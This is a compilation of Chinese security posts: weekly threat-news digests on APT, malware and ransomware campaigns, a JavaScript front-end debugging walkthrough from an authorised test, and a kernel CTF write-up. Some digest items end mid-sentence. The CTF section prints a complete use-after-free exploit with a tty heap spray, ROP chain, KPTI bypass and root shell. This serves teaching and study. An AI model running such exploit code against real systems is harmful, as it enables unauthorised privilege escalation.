1、APT29组织针对多国驻乌克兰大使馆发起网络钓鱼 https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing 2023年上半年，具备俄罗斯背景的APT29组织针对全球多国驻乌克兰大使馆的网络攻击行动有所加强，在这些攻击活动中，APT29优先考虑欧洲国家的外交部和大使馆。在2023年3月的一次网络钓鱼活动中，APT29组织通过鱼叉式电子邮件投递PDF附件，PDF以邀请受害者参加西班牙大使馆举办的“国际经济关系的未来”活动酒会为诱导主题，引导受害者从受感染的网站服务器中下载包含MUSKYBEAT木马（也称为 QUARTERRIG）的恶意文件并执行，在另一次 2、伊朗背景OilRig组织针对以色列发起网络攻击 https://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/ OilRig（又名APT34、Cobalt Gypsy、Hazel Sandstorm和Helix Kitten）是具有伊朗官方背景的APT组织，研究人员发现该组织曾在2021年和2022年策划了两起针对以色列目标的网络攻击活动，这些活动被研究人员命名为Outer Space和Juicy Mix。两起攻击活动具有相同的策略，OilRig 组织首先入侵一个合法网站用作C&C服务器，然 3、Stealth Falcon组织使用新型高级后门Deadglyph https://www.welivesecurity.com/en/eset-research/stealth-falcon-preying-middle-eastern-skies-deadglyph/ Stealth Falcon组织（又名FruityArmor、 Project Raven）于2016年首次被公民实验室曝光，该组织长期在中东地区展开一系列有针对性的间谍软件攻击，近期研究人员发现了一个名为Deadglyph的先前未记录的高级后门出现在Stealth Falcon组织的攻击活动中。Deadglyph后门由两个协作组件组成：一个是原生x64执行器，另一个是.NET后门程序，这 4、网络军火商Cytrox针对埃及议员发起间谍软件攻击 https://citizenlab.ca/2023/09/predator-in-the-wires-ahmed-eltantawy-targeted-with-predator-spyware-after-announcing-presidential-ambitions/ 2023年5月至9月期间，前埃及议员Ahmed Eltantawy在公开宣布计划预计在2024年竞选埃及总统后，其本人的通讯设备遭遇到了网络军火商Cytrox通过短信和WhatsApp等途径发送的Predator间谍软件攻击链接。研究人员在调查过程与Google威胁分析小组(TAG)合作获取了一个针对iPhone设备 5、890所学校受影响，美国学生信息交换中心遭Clop勒索攻击发生数据泄露 https://www.freebuf.com/news/379112.html 美国非营利性教育机构全国学生信息交换中心（National Student Clearinghouse）近期披露一起数据泄露事件，全美 890 所使用其服务的学校受到影响。由于赎金要求过高，预计 Clop 勒索软件网络犯罪团伙将收取约 7500 万至 1 亿美元的赎金。 6、苹果紧急更新修复了 3 个新的零日漏洞 https://www.bleepingcomputer.com/news/apple/apple-emergency-updates-fix-3-new-zero-days-exploited-in-attacks/ 苹果公司发布了紧急安全更新，以修补针对 iPhone 和 Mac 用户的攻击中利用的三个新零日漏洞，今年共修复了 16 个零日漏洞。 7、Atlassian 产品和 ISC BIND 服务器中发现高危漏洞 https://thehackernews.com/2023/09/high-severity-flaws-uncovered-in.html Atlassian 和互联网系统联盟（ISC）披露了影响其产品的几个安全漏洞，这些漏洞可能被用来实现拒绝服务（DoS）和远程代码执行。 8、FBI 和 CISA 联合发布针对“Snatch”的警告 http://www.anquan419.com/knews/24/5875.html 外媒消息， FBI 和 CISA 联合发布针对 “Snatch”的警告。警告称，Snatch 主要针对关键的基础设施领域，包括国防工业基地(DIB)、粮食和农业以及信息技术行业。 9、边检延误超 1 小时！网络攻击迫使加拿大边境检查站系统中断服务 https://www.secrss.com/articles/59091 加拿大边境服务署计算机遭到 DDoS 攻击，导致边检设备故障，延误时间超过一个小时之久。奇怪的是，据悉遭受攻击的系统应该处于隔离网，不知是如何被攻击的。 10、黑客从 MIXIN NETWORK 窃取了价值 2 亿美元的资产 https://securityaffairs.com/151433/hacking/mixin-network-200m-cyber-heist.html Mixin Network 是一家总部位于香港的加密货币公司，其提供免费、快如闪电的去中心化数字资产传输网络，该公司宣布遭遇 2 亿美元的网络盗窃。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、APT37组织利用朝韩政治社会话题发起网络钓鱼攻击 https://blog.alyac.co.kr/5251 Geumseong121 组织是朝鲜支持的 APT 攻击组织，也称 APT37 、 Group123 、 RedEyes 和 ScarCruft。攻击者将其伪装成一名与朝鲜有关的国内活动人士关于朝鲜领导人金正恩于 9 月 12 日至 17 日访问俄罗斯的手稿，从而引起了用户的兴趣。此次攻击中使用的文件包含大量虚拟值，这是攻击者通常用来逃避反病毒检测的方法之一。朝鲜黑客组织针对国内涉朝组织或活动人士的鱼叉式网络攻击变得越来越复杂和有针对性。 2、研究人员披露BBTok银行木马新变种 https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/ 研究人员最近发现一个活跃的活动在拉丁美洲运营和部署 BBTok 银行木马的新变种。在这项研究中，研究人员重点介绍了新发现的感染链，这些感染链使用了一种独特的靠地二进制文件 (LOLBins) 组合。这导致检测率较低，尽管 BBTok 银行木马至少自 2020 年以来一直在运营。在研究人员分析该活动时，发现了攻击者在攻击中使用的一些服务器端资源，目标是巴西和墨西哥的数百名用户。 3、研究人员披露LUCR-3勒索软件组织 https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud LUCR-3 与 Scattered Spider、Oktapus、UNC3944 和 STORM-0875 等组织重叠，是一个出于经济动机的攻击者，利用身份提供商 (IDP) 作为环境的初始访问权限，目的是窃取知识产权 (IP)勒索。LUCR-3 针对各个行业的财富 2000 强公司，包括但不限于软件、零售、酒店、制造和电信。LUCR-3 并不严重依赖恶意软件甚至脚本，而是 LUCR-3 熟练地使用受害者自己的工具、应用程序和资源来实现其目 4、Gold Melody攻击组织向勒索软件出售攻陷网络访问权限 https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker 出于经济动机的攻击者Gold Melody组织已被揭露为初始访问经纪人(IAB)，该经纪人向其他对手出售受感染组织的访问权限，以实施勒索软件等后续攻击。这个出于经济动机的组织至少从 2017 年起就一直活跃，通过利用未修补的面向互联网的服务器中的漏洞来危害组织。受害者学表明，这是为了经济利益而进行的机会主义攻击，而不是由国家支持的威胁组织进行的旨在从事间谍活动、破坏或破坏的有针对性的活动。据观察，截至 2020 年中期，该网 5、攻击者在GitHub发布虚假WinRAR漏洞POC以传播Venom远控 https://unit42.paloaltonetworks.com/fake-cve-2023-40477-poc-hides-venomrat/ 恶意行为者针对 GitHub 上最近披露的 WinRAR 漏洞发布了虚假概念验证 (PoC) 漏洞，目的是用 Venom RAT 恶意软件感染下载代码的用户。攻击者利用此 WinRAR 漏洞的虚假 PoC 是基于公开可用的 PoC 脚本，该脚本利用了名为 GeoServer 的应用程序中的 SQL 注入漏洞，该漏洞被跟踪为 CVE-2023-25157。托管该存储库的GitHub 帐户halersplonk不再可访问。据称该 PoC 于 20 6、T-Mobile应用程序故障可允许用户查看他人帐户信息 https://www.bleepingcomputer.com/news/security/t-mobile-app-glitch-let-users-see-other-peoples-account-info/ T-Mobile 客户表示，他们在登录该公司的官方移动应用程序后可以看到其他人的帐户和账单信息。根据社交媒体上的用户报告，暴露的信息包括客户的姓名、电话号码、地址、账户余额以及信用卡详细信息，例如到期日期和最后四位数字。一些受此问题影响的客户在登录自己的帐户时可能会看到其他多人的敏感信息。虽然今天早些时候 Reddit 和 Twitter 上开始出现大量报告，但一些 T-Mob 7、新加坡警方警告新型安卓恶意软件诈骗规模逾1000万新元 https://www.channelnewsasia.com/singapore/android-malware-scam-factory-reset-phone-police-3785801 新加坡警方发布了有关安卓恶意软件诈骗新变种的通报，其中，当恶意软件在手机的网上银行应用程序上执行未经授权的交易后，诈骗者会在受感染的设备上启动恢复出厂设置。2023 年上半年，已有超过 750 起受害者将恶意软件下载到手机中的案例，损失至少为 1000 万新元（730 万美元）。受害者会在 Facebook 和 Instagram 等社交媒体平台上看到各种服务的广告，例如家庭清洁和宠物美容以及食品购 8、研究人员披露XWorm远控木马新变种的攻击活动 https://thehackernews.com/2023/09/inside-code-of-new-xworm-variant.html XWorm 是远程访问木马群体中相对较新的代表，它已经成为全球最持久的威胁之一。自 2022 年研究人员首次观察到它以来，它经历了多次重大更新，显着增强了其功能并巩固了其持久力。研究人员发现了该恶意软件的最新版本，因此无法拒绝将其拆开以检查 XWorm 机制配置的机会。该样本最初是通过文件托管服务 MediaFire 分发的。该恶意软件打包在 RAR 存档中并受密码保护。执行后，Suricata 规则立即检测到该威胁，并将其识别为 XWorm。 9、Atos Unify安全性产品存在严重远程代码执行漏洞 https://www.securityweek.com/atos-unify-vulnerabilities-could-allow-hackers-to-backdoor-systems Atos Unify 产品中发现的两个漏洞可能允许恶意行为者造成破坏，甚至对目标系统建立后门访问。研究人员在统一通信和协作解决方案中发现了这些漏洞。SEC Consult 是一家总部位于奥地利的网络安全咨询公司，隶属于 Atos Group 的 Eviden 业务。这些漏洞影响为统一通信提供安全性的 Atos Unify 会话边界控制器 (SBC)、用于远程办公室的 Unify OpenScape Br 10、Omron公司修补被工控恶意软件利用过的PLC和工程软件漏洞 https://www.securityweek.com/omron-patches-plc-engineering-software-flaws-discovered-during-ics-malware-analysis/ 日本电子公司Omron最近修补了工业网络安全公司 Dragos 在分析复杂恶意软件时发现的可编程逻辑控制器 (PLC) 和工程软件漏洞。去年，美国网络安全机构 CISA 向组织通报了影响 Omron NJ 和 NX 系列控制器的三个漏洞。这些漏洞之一是 CVE-2022-34151 的关键硬编码凭据问题，可用于访问欧姆龙 PLC。Pipedream 被认为是一个国家支 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

前言 前端调试是安全测试的重要组成部分。它能够帮助我们掌握网页的运行原理，包括js脚本的逻辑、加解密的方法、网络请求的参数等。利用这些信息，我们就可以更准确地发现网站的漏洞，制定出有效的攻击策略。前端知识对于安全来说，不但可以提高测试效率，还可以拓宽测试思路。 以下的一个案例是我在测试一个后台管理系统时遇到的问题，本来在登录页面通过js已经发现了接口和字段，但是请求的时候发现不是未授权漏洞，但是字段只有新密码和用户名，那么这个大概率是存在漏洞的。 正文 本次为授权测试，客户有提供账号密码。在后台的修改密码处： JavaScript分析 当我输入正确密码时，又消失，说明存在校验。要么后端校验，要么前端校验。通过前面登录前的js内容，大致可以猜到这个就是前端校验。 我使用burp进行抓取数据包，发现没有请求通过： 说明大概率前端校验（也有可能是抓不到，但是概率很小）接下来就是要分析前端js了。这边我主要分析的是文本框的"与初始密码不一致"这个提示信息的判断逻辑： 我这边分析主要有两种方法： ①事件监听器： 通过事件监听器去找对应的js事件，通过正向去查看js，跟着对应的函数一层一层进行代码审计： 但是通过正向找过去，发现是经过多层调用的。且所有代码经过高度压缩混淆。 这时候还可以通过其他的按钮去找，大概率处理逻辑的js都是在一起的。当然只是可能。 找到提交按钮。 点击是会报错的。查看下这个提交的逻辑： 找到submit，去查看调用的js代码： 很不幸，还是这个混淆过的看不懂的js。按住ctrl还进不去函数，不知道为什么。GG。 ②直接搜对应的关键字，去js里面翻 这个方法应该是大家比较常用的方法了。直接搜索关键字，比如加解密就直接搜索encrypt，一般都有效。 比如这边，可以直接搜索报错信息：与初始密码不一致： 找过去都是0。这时候就应该考虑，他是否有可能保存在css里面，或者使用urlencode或者Unicode编码。 （PS：因为没有对于后端请求，我们就不做从后端响应的情况假设。不然正常的字符串在前端找不到的情况下，有可能是后端返回的。） 先把这些字符转为Unicode编码查看。作为字符去查询的时候，建议不要全部字符去查询，因为有时候他可能会把对应的字符串分开放，或者做拼接。使用可以直接搜索比如不容易重复的几个关键字。比如这边的"一致"。 对于搜索，可以把js和html页面都代理从burp出去，然后使用burp自带的搜索，可能会比较方便。我这边就是采用这种方法进行查询： 很幸运，找到了！ +-----------------------------------------------------------------------+| function At(n, o) { || || 1 & n && (t.TgZ(0, "mat-hint"), || || t._uU(1, || "\u4e0e\u521d\u59cb\u5bc6\u7801\u4e0d\u4e00\u81f4"), || || t.qZA()) || || } || || function bt(n, o) { || || 1 & n && (t.TgZ(0, "mat-hint"), || || t._ 可以看到js高度混淆。 对于审计很难。这边我们只需要查看是谁调用了这个函数，网上找这个逻辑即可。 有几种方法可以找到，这边借用new bing的回答： 您好，这是Bing。 根据我的搜索结果，有几种方法可以在Chrome中实现这个功能。我将为您介绍其中的一些方法： 1、使用Chrome开发者工具的搜索功能¹。您可以按下`ctrl + shift +F`（Windows）或`cmd + optn +F`（macOS）打开一个跨所有脚本的搜索窗口。然后，您可以勾选"正则表达式"复选框，并搜索函数的名称和定义方式。例如，如果您想要查找名为`foo`的函数，您可以搜索`foo\s*=\s*function`（表示`foo=function`之间有任意数量的空格）或者`function\s*foo\s*\(`（表示`functionfoo(`之间有任意数量的空格）。搜索结果将显示函数定义所在的脚本和位置，您可以点击它们跳转到相应的代码行。 2、使用Chrome开发者工具的调用栈功能。如果您想要查找一个函数是从哪里被调用的，您可以在函数体内部添加一个断点，然后运行代码。当代码执行到断点处时，开发者工具会暂停，并显示当前的调用栈。您可以在调用栈面板中查看函数被调用的顺序和位置，以及每个函数的参数和局部变量。 3、使用JavaScript代码获取函数的调用者³。如果您想要在代码中获取一个函数是从哪里被调用的，您可以使用`arguments.callee.caller`属性来访问当前函数的调用者。这个属性会返回一个函数对象，您可以使用它的`name`属性来获取函数的名称，或者使用它的`toString()`方法来获取函数的源代码。如果当前函数是从全局作用域被调用的，那么这个属性会返回`null`，您可以使用条件判断来处理这种情况。 我这边采用了第二点，可以在这边看到栈的调用。 成功找到密码判断点： 接下来就可以看你想改什么就改什么了。 JavaScript本地修改调试 找到对应函数后，接下来就是修改js里面的内容了。如果想修改js，在前端调试，需要在替换里面添加一个文件夹，然后在js编辑界面保存即可。保存成功会有紫色的小点点： 在js里面添加一个console.log，测试调试。触发该函数后，成功打印： 后续如果想通过前端绕过，可以同样去调试提交按钮。 结尾 可能有些人会说，这么麻烦去绕过做什么？本文只是讲解一些调试思路，和本次的漏洞没有太大关系，只是作为案例讲解。我本身不是做前端出身，主做分享使用。很多方面的知识我也是自己有接触到才去学习，可能对于一些大佬来说，这些都是很基础，勿喷。给自己挖个坑，如果本文反响不错的话，后续给大家分享一些遇到js前端加解密的web站点，该怎么去进行调试和测试。

1、攻击者利用商业软件Remcos和GuLoader进行网络攻击 https://research.checkpoint.com/2023/unveiling-the-shadows-the-dark-alliance-between-guloader-and-remcos/ 标榜合法的软件已成为网络犯罪分子的首选武器。此行为的两个著名示例是 Remcos RAT（远程管理工具）和 GuLoader（也称为 CloudEyE Protector）。这些程序被定位为合法工具，经常被用于攻击，并在最流行的恶意软件排名中占据前列。虽然卖家声称这些工具只能合法使用，但更深层次的事实是，他们的主要客户正是网络犯罪分子。由于 Remcos 很容易被防病毒解决方案检测到 2、攻击者针对Celsius加密货币破产案的索赔人发起钓鱼攻击 https://twitter.com/search?q=%22case-stretto.com 诈骗者冒充加密货币贷款机构 Celsius 的破产索赔代理人进行网络钓鱼攻击，试图从加密货币钱包中窃取资金。2022 年 7 月，加密货币贷款机构 Celsius 申请破产并冻结用户账户提款。此后，客户向该公司提出索赔，希望收回部分资金。在过去的几天里，用户报告说收到了冒充来自 Celsius 破产程序索赔代理人 Stretto 的网络钓鱼电子邮件。如果您收到一封声称与摄氏度有关的电子邮件，请忽略它，并在合法的网站上检查该案件的最新更新 。不幸的是，如果您已经访问过这些网络钓鱼网站之一，并且在连 3、研究人员披露基于Rust恶意软件针对阿塞拜疆的攻击活动 https://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets 研究人员正在以 Operation Rusty Flag 的名义追踪此次行动。位于阿塞拜疆的目标已被挑选为新活动的一部分，该活动旨在在受感染的系统上部署基于 Rust 的恶意软件。它尚未与任何已知的攻击者或组织相关联。该操作至少有两个不同的初始访问向量。这次行动中使用的诱饵之一是 Storm-0978 组织使用的一份修改过的文件。这可能是故意的‘假旗’。这一行动看起来像是一次故意的虚 4、研究人员披露FIN12勒索软件组织攻击活动 https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf 2023 年 3 月 9 日星期四，研究人员发布布雷斯特大学医院中心 (CHU) 的一台服务器遭到入侵报告。卫生机构的响应能力使得能够快速将信息系统与互联网隔离，并阻碍攻击者作案手法（MOA）的进展，从而防止数据外泄和信息系统的加密“信息”。研究人员发现了与在法国周边观察到并在公开来源中报告的一系列事件的联系，从而将这次攻击与 FIN12 网络犯罪作案手法联系起来。FIN12 的运营商对法国领土上发生的大量勒索软件攻击负有责任。 2020 年至 2023 年间，他们会先使 5、GitLab提示用户安装针对关键管道漏洞的安全更新 https://about.gitlab.com/releases/2023/09/18/security-release-gitlab-16-3-4-released/ GitLab 发布了安全更新，以解决一个严重严重的漏洞，该漏洞允许攻击者通过计划的安全扫描策略以其他用户的身份运行管道。GitLab 是一个流行的基于网络的开源软件项目管理和工作跟踪平台，提供免费和商业版本。该漏洞被指定为 CVE-2023-5009 （CVSS v3.1 评分：9.6），影响 GitLab 社区版 (CE) 和企业版 (EE) 版本 13.12 至 16.2.7 以及版本 16.3 至 16.3.4。在用 6、LockBit 要求将受害公司收入的 3% 作为赎金 https://cybersecuritynews.com/lockbit-demands-3-revenue-ransom/ LockBit内部拟要求对受害公司收取其收入的3%作为赎金，以统一其附属组织不一致的赎金标准。 7、OpenAI 宣布推出“红队网络”，旨在提高其 AI 模型安全性 https://www.ithome.com/0/720/350.htm 美国人工智能研究公司 OpenAI 宣布推出“红队网络”（Red Teaming Network），并邀请各领域专家加入其“红队网络”，以提高其人工智能（AI）模型的安全性。 8、Apple 发布紧急更新以解决 3 个新的被积极利用的零日漏洞 https://securityaffairs.com/151174/hacking/apple-zero-days.html Apple 发布了紧急安全更新，以解决三个新的零日漏洞（CVE-2023-41993、CVE-2023-41991、CVE-2023-41992），这些漏洞已在野外攻击中被利用。这三个缺陷是由多伦多大学蒙克学院公民实验室的 Bill Marczak 和谷歌威胁分析小组的 Maddie Stone 发现的。 9、乌克兰黑客是Free Download Manager供应链攻击的幕后黑手 https://securityaffairs.com/151157/hacking/free-download-manager-supply-chain-attack-2.html 最近发现的免费下载管理器 (FDM) 供应链攻击始于 2020 年，该攻击分发 Linux 恶意软件。现在，免费下载管理器 (FDM) 的维护者分享了他们的调查结果。他们发现乌克兰黑客组织破坏了其网站上的特定网页，然后用它来传播恶意软件。 10、新的“Sandman”APT 组织利用罕见的 LuaJIT 恶意软件攻击电信公司 https://www.securityweek.com/new-sandman-apt-group-hitting-telcos-with-rare-luajit-malware/ 根据 SentinelLabs 和 QGroup GmbH 的联合调查，发现一个新的神秘 APT 组织以欧洲和亚洲的电信服务提供商为目标，这似乎是网络间谍活动的一部分。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

前言 UAF是用户态中常见的漏洞，在内核中同样存在UAF漏洞，都是由于对释放后的空间处理不当，导致被释放后的堆块仍然可以使用所造成的漏洞。 LK01-3 结合题目来看UAF漏洞 项目地址：https://github.com/h0pe-ay/Kernel-Pwn/tree/master/LK01-3 open模块 在执行open模块时会分配0x400大小的堆空间，并将地址存储在g_buf中 #define BUFFER_SIZE 0x400 char *g_buf = NULL; static int module_open(struct inode *inode, struct file *file) {  printk(KERN_INFO "module_open called\n");  g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);  if (!g_buf) {    printk(KERN_INFO "kmalloc failed");    return -ENOMEM; }  return 0; } read模块 在读模块中，会从用户空间中读取0x400字节到g_buf执行的堆空间中 static ssize_t module_read(struct file *file,                           char __user *buf, size_t count,                           loff_t *f_pos) {  printk(KERN_INFO "module_read called\n");  if (count > BUFFER_SIZE) {    printk(KERN_INFO "invalid buffer size\n");    return -EINVAL; }  if (copy_to_user(buf, g_buf, count)) {    printk(KERN_INFO "copy_to_user failed\n");    return -EINVAL; }  return count; } write模块 在写模块中，会从用户空间拷贝400字节数据到内核堆空间中 static ssize_t module_write(struct file *file,                            const char __user *buf, size_t count,                            loff_t *f_pos) {  printk(KERN_INFO "module_write called\n");  if (count > BUFFER_SIZE) {    printk(KERN_INFO "invalid buffer size\n");    return -EINVAL; }  if (copy_from_user(g_buf, buf, count)) {    printk(KERN_INFO "copy_from_user failed\n");    return -EINVAL; }  return count; } close模块 close模块会释放g_buf指向的堆块空间 static int module_close(struct inode *inode, struct file *file) {  printk(KERN_INFO "module_close called\n");  kfree(g_buf);  return 0; } 漏洞分析 在读写模块中都限制了长度为0x400，这与一开始分配的堆空间大小一致，因此与LK01-2不同的是不存在堆溢出漏洞。但是在open模块中g_buf是唯一用来存储堆地址的变量，并且没有进行次数限制，那么就会导致多次调用open模块会使得存在多个指针指向同一块内存，若该内存被释放就会造成UAF漏洞。下图就是构造UAF漏洞的流程。 当把g_buf释放掉后，通过fd2文件描述符同样能够操控g_buf的空间，问题是该如何劫持程序流程，由于堆空间是通过slab分配器进行分配的，而slab还可而已进行缓存，因此g_buf被释放后会放进缓存中，而g_buf的大小为0x400这与tty结构体一致，因此此时通过堆喷确保g_buf被分配到tty结构体。构造uaf的代码如下。 ... int fd1 = open("/dev/holstein", O_RDWR); int fd2 = open("/dev/holstein", O_RDWR); close(fd1); for (int i = 0; i < 50; i++) { spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY); if (spray[i] == -1) { printf("error!\n"); exit(-1); } } ... 这里我有一个疑惑的点，在模块中的close函数仅仅只是释放了g_buf的堆内存并没有后续操作，因此在执行close(fd1)之后，是不是还能对文件描述符fd1进行操作，后来试验之后发现不行，查询资料得到，文件描述符的移除是内核默认操作与重定义模块的close操作无关。 在构造出UAF漏洞并进行堆喷之后，实际操作的g_buf指向的是tty的结构体，该结构体偏移0x18是一个函数表的操作指针，那么将该函数表修改为自定义的函数表即可。后续的操作与LK01-3一致，将指针操作修改为栈迁移到堆上，然后就是执行commit_creds(prepare_kernel_cred(0))，利用swapgs_restore_regs_and_return_to_usermode绕过kpti的保护。 run.sh #!/bin/sh qemu-system-x86_64 \    -m 64M \    -nographic \    -kernel bzImage \    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on kaslr" \    -no-reboot \    -cpu qemu64,+smap,+smep \    -smp 1 \    -monitor /dev/null \    -initrd initramfs.cpio.gz \    -net nic,model=virtio \    -net user \    -s exp #include <stdio.h> #include <ctype.h> #include <fcntl.h> #include <unistd.h> #include <sys/stat.h> #include <string.h> #include <stdlib.h> int spray[100]; //0xffffffff8114fbe8: add al, ch; push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret; //0xffffffff8114078a: pop rdi; ret; //0xffffffff81638e9b: mov rdi, rax; rep movsq qword ptr [rdi], qword ptr [rsi]; ret; //0xffffffff810eb7e4: pop rcx; ret; //0xffffffff81072560 T prepare_kernel_cred //0xffffffff810723c0 T commit_creds //0xffffffff81800e10 T swapgs_restore_regs_and_return_to_usermode #define push_rdx_pop_rsp_offset 0x14fbe8 #define pop_rdi_ret_offset 0x14078a #define pop_rcx_ret_offset 0xeb7e4 #define prepare_kernel_cred_offset 0x72560 #define commit_creds_offset 0x723c0 #define swapgs_restore_regs_and_return_to_usermode_offset 0x800e10 #define mov_rdi_rax_offset 0x638e9b unsigned long user_cs, user_sp, user_ss, user_rflags; void backdoor() { printf("****getshell****"); system("id"); system("/bin/sh"); } void save_user_land() { __asm__( ".intel_syntax noprefix;" "mov user_cs, cs;" "mov user_sp, rsp;" "mov user_ss, ss;" "pushf;" "pop user_rflags;" ".att_syntax;" ); puts("[*] Saved userland registers"); printf("[#] cs: 0x%lx \n", user_cs); printf("[#] ss: 0x%lx \n", user_ss); printf("[#] rsp: 0x%lx \n", user_sp); printf("[#] rflags: 0x%lx \n", user_rflags); printf("[#] backdoor: 0x%lx \n\n", backdoor); } int main() { save_user_land(); int fd1 = open("/dev/holstein", O_RDWR); int fd2 = open("/dev/holstein", O_RDWR); close(fd1); for (int i = 0; i < 50; i++) { spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY); if (spray[i] == -1) { printf("error!\n"); exit(-1); } } char buf[0x400]; read(fd2, buf, 0x400); unsigned long *p = (unsigned long *)&buf; //for (unsigned int i = 0; i < 0x80; i++) // printf("[%x]:addr:0x%lx\n",i,p[i]); unsigned long kernel_addr = p[3]; unsigned long heap_addr = p[7]; printf("kernel_addr:0x%lx\nheap_addr:0x%lx\n",kernel_addr,heap_addr); unsigned long kernel_base = kernel_addr - 0xc39c60; unsigned long g_buf = heap_addr - 0x38; printf("kernel_base:0x%lx\ng_buf:0x%lx\n",kernel_base,g_buf); *(unsigned long *)&buf[0x18] = g_buf; p[0xc] = push_rdx_pop_rsp_offset + kernel_base; //for (unsigned long i = 0xd; i < 0x80; i++) // p[i] = i; p[0x21] = pop_rdi_ret_offset + kernel_base; p[0x22] = 0; p[0x23] = prepare_kernel_cred_offset + kernel_base; p[0x24] = pop_rcx_ret_offset + kernel_base; p[0x25] = 0; p[0x26] = mov_rdi_rax_offset + kernel_base; p[0x27] = commit_creds_offset + kernel_base; p[0x28] = swapgs_restore_regs_and_return_to_usermode_offset + 0x16 + kernel_base; p[0x29] = 0; p[0x2a] = 0; p[0x2b] = (unsigned long)backdoor;    p[0x2c] = user_cs;    p[0x2d] = user_rflags;    p[0x2e] = user_sp;    p[0x2f] = user_ss;   write(fd2, buf, 0x400); for (int i = 0; i < 50; i++) ioctl(spray[i], 0, g_buf+0x100); }

1、研究人员披露基于ERMAC木马的Hook家族银行木马 https://research.nccgroup.com/2023/09/11/from-ermac-to-hook-investigating-the-technical-differences-between-two-android-malware-variants/ 研究人员发现 ERMAC 源代码被用作 Hook 的基础。恶意软件操作者可以发送到感染 ERMAC 恶意软件的设备的所有命令（总共 30 个）也存在于 Hook 中。这些命令的代码实现几乎相同。研究人员于 2023 年 1 月首次记录了 Hook ，将其描述为“ERMAC分叉”，每月售价 7000 美元。这两种病毒都是恶 2、趋势科技修复了端点保护服务中远程代码执行零日漏洞 https://thehackernews.com/2023/09/trend-micro-releases-urgent-fix-for.html 趋势科技修复了趋势科技 Apex One 端点保护解决方案中的远程代码执行零日漏洞，该漏洞在攻击中被积极利用。Apex One 是一款适合各种规模企业的端点安全解决方案，“无忧企业安全”套件专为中小型企业设计。该任意代码执行缺陷被跟踪为 CVE-2023-41179，根据 CVSS v3，其严重程度评级为 9.1，将其归类为“严重”。该漏洞存在于安全软件附带的第三方卸载程序模块中。趋势科技观察到至少有一次针对此漏洞的潜在攻击活动 。强烈鼓励客户 3、研究人员发现 Nagios XI 网络监控软件存在严重漏洞 https://securityaffairs.com/151138/security/nagios-xi-flaws.html 研究人员在 Nagios XI 网络和 IT 基础设施监控解决方案中发现了四个漏洞（CVE-2023-40931、CVE-2023-40932、CVE-2023-40933、CVE-2023-40934），这些漏洞可能导致信息泄露和权限升级。Nagios XI 提供对所有关键任务基础设施组件的监控，包括应用程序、服务、操作系统、网络协议、系统指标和网络基础设施。它被全球数千个组织使用。 4、芬兰警方捣毁暗网毒品市场 PIILOPUOTI https://securityaffairs.com/151131/deep-web/finnish-police-seized-piilopuoti-marketplace.html 芬兰海关宣布查封暗网市场 Piilopuoti，作为国际执法行动的一部分。据欧洲刑警组织称，调查仍在进行中，执法机构正在努力查明该平台上的卖家和用户的身份。 5、国际刑事法院遭受网络攻击 https://securityaffairs.com/151115/hacking/international-criminal-court-cyber-attack.html 国际刑事法院（ICC）本周披露了一次网络攻击，其系统上周遭到破坏。 6、GITLAB 修复了严重漏洞 CVE-2023-5009 https://securityaffairs.com/151107/security/gitlab-critical-vulnerability-cve-2023-5009.html GitLab 已发布安全补丁来解决一个严重漏洞，编号为 CVE-2023-5009 （CVSS 评分：9.6），该漏洞允许攻击者以其他用户身份运行管道。 7、Signal Messenger 推出 PQXDH 抗量子加密 https://thehackernews.com/2023/09/signal-messenger-introduces-pqxdh.html 加密消息应用程序 Signal 宣布更新 Signal 协议，通过将扩展三重 Diffie-Hellman ( X3DH ) 规范升级为后量子扩展 Diffie-Hellman ( PQXDH ) 来增加抗量子攻击支持。 8、Sainbox RAT、ValleyRAT 和 Gh0stRAT 针对中国用户 自 2023 年初以来，Proofpoint 观察到与可疑的中国网络犯罪活动相关的恶意软件的电子邮件分发有所增加。这包括尝试传递 Sainbox 远程访问木马 (RAT)（商品木马 Gh0stRAT 的变种）以及新发现的 ValleyRAT 恶意软件。 9、恶意 NPM 包窃取 Kubernetes 配置、SSH 密钥 https://blog.sonatype.com/npm-packages-caught-exfiltrating-kubernetes-config-ssh-keys 恶意软件包冒充合法的 JavaScript 库和组件，但在安装后，它们会运行混淆代码来收集和窃取敏感文件。 10、马自达服务器被"黑" 或有超10万人信息被泄露 https://news.mydrivers.com/1/935/935571.htm 马自达汽车前几日表示，该公司内部系统服务器遭到外部入侵，导致公司员工及合作方人员的姓名及电话号码共计约104732份信息可能被泄露。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

